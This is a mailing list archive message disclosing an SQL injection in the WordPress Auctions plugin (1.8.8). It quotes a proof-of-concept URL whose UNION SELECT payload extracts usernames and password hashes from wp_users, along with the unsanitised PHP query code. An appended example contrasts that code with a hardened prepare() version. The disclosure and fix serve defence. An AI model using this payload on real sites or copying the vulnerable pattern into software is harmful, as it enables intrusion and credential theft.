lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <20110915134345.GA897@foo.fgeek.fi>
Date: Thu, 15 Sep 2011 16:43:45 +0300
From: Henri Salo <henri@...v.fi>
To: "Heyder[AlligatorTeam]" <heyder@...igatorteam.org>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: WordPress Auctions plugin <= 1.8.8 SQL Injection

On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote:
> On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:
> > # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection
> > Vulnerability
> > # Date: 2011-09-09
> > # Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org>
> > @AlligatorTeam
> > # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> > # Version: 1.8.8 (tested)
> >
> > ---------------
> > PoC
> > ---------------
> >
> > URL:
> > http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> >
> > ---------------
> > Vulnerable code
> > ---------------
> > ...
> > elseif($_GET["wpa_action"] == "edit"):
> > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> > ...
> > elseif($_GET["wpa_action"] == "relist"):
> > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> > ...
> > $resultList = $wpdb->get_row($strSQL);
> > ...
>
> Did you report this issue to the author of the plugin?
>
> Best regards,
> Henri Salo

Module owner replied: "Thanks for raising this with us. The report is right in pointing out that those parameters aren't sanitised (which we will address immediately). It's worth pointing out though, that this is an administration module (protected by WordPress's user permissions); rather than one that can be accessed anonymously."
Follow-up: http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
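The quoted "edit" and "relist" branches share one defect: `$_GET["wpa_id"]` is concatenated into the query string, so the `-1 union all select ...` payload in the PoC becomes part of the statement and the 21-column UNION returns a `wp_users` row in place of the product. The following is an added example written for this page, not code from the wp-auctions plugin or its author: it places that pattern beside a hardened version that binds the id with `%d` through `$wpdb->prepare()`, and runs both against the advisory's payload. `WP_DB_Stub` is an assumed minimal stand-in for WordPress' `$wpdb` so the script runs from the CLI, and the table name `wp_wpa_products` is assumed; in a plugin the real global `$wpdb` is used and `$table_name` comes from the plugin itself.

```php
<?php
// Added example, not code from the wp-auctions plugin: the id lookup pattern
// quoted in the advisory beside a hardened form, both run against the
// advisory's payload. WP_DB_Stub is an assumed minimal stand-in for WordPress'
// $wpdb so the script runs from the CLI (php this_file.php); in a plugin use
// the real global $wpdb, whose prepare() has the same %d/%s semantics.

class WP_DB_Stub {
    // Simplified emulation of wpdb::prepare(): %d is cast to int, %s is
    // quoted. The real method escapes %s through the live MySQL connection;
    // for the integer id used here the cast is the whole point.
    public function prepare(string $query, ...$args): string {
        $i = 0;
        return preg_replace_callback('/%[ds]/', function ($m) use (&$i, $args) {
            $arg = $args[$i++] ?? null;
            if ($m[0] === '%d') {
                return (string) (int) $arg;
            }
            return "'" . addslashes((string) $arg) . "'";
        }, $query);
    }
}

// The vulnerable pattern from the advisory: the "edit" and "relist" branches
// both concatenate $_GET["wpa_id"] straight into the SQL string.
function build_vulnerable_query(string $table_name, array $get): string {
    return "SELECT * FROM " . $table_name . " WHERE id=" . $get["wpa_id"];
}

// Hardened form: id is an integer column, so cast the input and bind it with
// %d through prepare(). Whatever the attacker appends after the leading
// number is discarded by the cast, so only "WHERE id=-1" reaches MySQL.
function build_safe_query(WP_DB_Stub $wpdb, string $table_name, array $get): string {
    $id = (int) ($get["wpa_id"] ?? 0);
    return $wpdb->prepare("SELECT * FROM " . $table_name . " WHERE id=%d", $id);
}

// Constructed request: the advisory's wpa_id payload, URL-decoded.
$payload = '-1 union all select 1,2,3,USER(),'
         . 'concat(user_login,char(58),user_pass),DATABASE(),'
         . '7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from wp_users';
$get = ['wpa_action' => 'edit', 'wpa_id' => $payload];

$table_name = 'wp_wpa_products'; // assumed name; the plugin builds its own $table_name
$wpdb = new WP_DB_Stub();

echo "vulnerable: ", build_vulnerable_query($table_name, $get), PHP_EOL;
echo "hardened:   ", build_safe_query($wpdb, $table_name, $get), PHP_EOL;
```

The first line printed is the full injected statement, with the UNION intact; the second ends at `id=-1`. The same builder serves both the "edit" and "relist" branches, since they differ only in the action name. The `_wpnonce` in the PoC URL and the permission check the module owner refers to decide who can reach this handler; they do not change what the query does once reached, so the cast and `prepare()` are needed regardless of the page being admin-only.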